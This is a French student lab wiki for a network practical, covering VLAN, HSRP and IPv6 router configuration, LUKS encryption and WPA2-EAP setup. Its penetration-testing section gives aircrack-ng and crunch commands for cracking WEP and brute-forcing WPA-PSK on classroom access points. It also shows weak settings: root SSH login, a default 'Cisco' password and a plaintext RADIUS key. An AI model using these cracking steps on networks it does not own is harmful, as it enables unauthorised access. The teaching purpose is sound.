 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52086</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52086"/>
				<updated>2020-01-14T21:52:00Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
